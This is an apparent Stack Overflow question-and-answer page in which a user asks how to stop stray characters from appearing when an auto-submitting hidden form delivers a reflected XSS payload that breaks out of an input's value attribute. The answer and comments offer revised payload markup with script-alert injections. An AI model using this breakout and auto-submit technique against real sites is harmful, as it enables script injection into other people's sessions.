XSS: Character showing in DOM

Question

I have created an html page that redirects user to a test site that has an XSS vulnerability. I am able to successfully execute javascript via the vulnerability. However, I have found that some of the characters I am using as part of the XSS attack are displaying in the DOM. How can I hide these characters from showing in the DOM?

<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input 
        type="hidden"
        name="login"
        value='"><script>alert(document.location)</script>'
      </input>
    </form>
  </body>

score 0 · Answer 1 · answered Apr 12 '19 at 06:55

0

Typo Error value='" & remove last ' />

<form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value="" /><script>alert(3)</script>
    </form>

<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value=""><script>alert(3)</script>
    </form>
  </body>

answered Apr 12 '19 at 06:55

Prakash Software

141
4

@ChrisSmith make the input tag self closed. – Teemu Apr 12 '19 at 07:03
@Teemu Can you provide an example of the change? – Chris Smith Apr 12 '19 at 07:14
Issue still persists. – Chris Smith Apr 12 '19 at 07:19
Please be more careful when writing ... Does that look like a self-closed `input`??? You can't nest a tag inside of a tag, you need separate tags for the input and the script. – Teemu Apr 12 '19 at 07:22
@Teemu I am trying to achieve XSS. How would I be able to inject XSS with a self closed input??? – Chris Smith Apr 12 '19 at 07:26
@ChrisSmith Usually you don't. – Teemu Apr 12 '19 at 07:39

XSS: Character showing in DOM

1 Answers1

Linked